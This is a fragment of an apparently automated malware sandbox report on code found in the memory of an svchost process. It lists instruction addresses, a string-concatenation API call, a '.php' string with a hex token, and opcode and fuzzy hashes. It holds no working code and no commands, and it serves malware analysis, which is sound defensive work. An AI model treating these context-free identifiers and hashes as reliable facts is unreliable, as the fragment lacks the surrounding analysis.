                    0x004c1fe6
                    0x004c1ff5
                    0x004c1ffa
                    0x004c1ffe
                    0x004c2000
                    0x004c200a
                    0x004c2010
                    0x004c2012
                    0x004c2014
                    0x004c2017
                    0x004c201a
                    0x004c201d
                    0x004c1fe6
                    0x004c2021
                    0x004c2025
                    0x004c2027
                    0x004c202b
                    0x004c2034
                    0x004c2037
                    0x004c2038
                    0x004c203b
                    0x004c2041
                    0x004c2027
                    0x004c2045
                    0x004c204b
                    0x004c206b

                    APIs
                    • lstrcatA.KERNEL32(?,00000000), ref: 004C2061
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat
                    • String ID: .php$730c0a4976f1cf34
                    • API String ID: 4038537762-625203125
                    • Opcode ID: f9a1c27d43f6834a82564bc48cf29ebb529183daa25d6854bd9c4d047da8bf8e
                    • Instruction ID: 006527835f1bd9005e099450ccb9e5c7b79fd6aec5bc7ed49751255ca625fc99
                    • Opcode Fuzzy Hash: f9a1c27d43f6834a82564bc48cf29ebb529183daa25d6854bd9c4d047da8bf8e
                    • Instruction Fuzzy Hash: E921283AE04214AFC741DFE9E8C5FAE7BA4DB45314F21406FE561D7282EA78A9018B54
                    Uniqueness

                    Uniqueness Score: -1.00%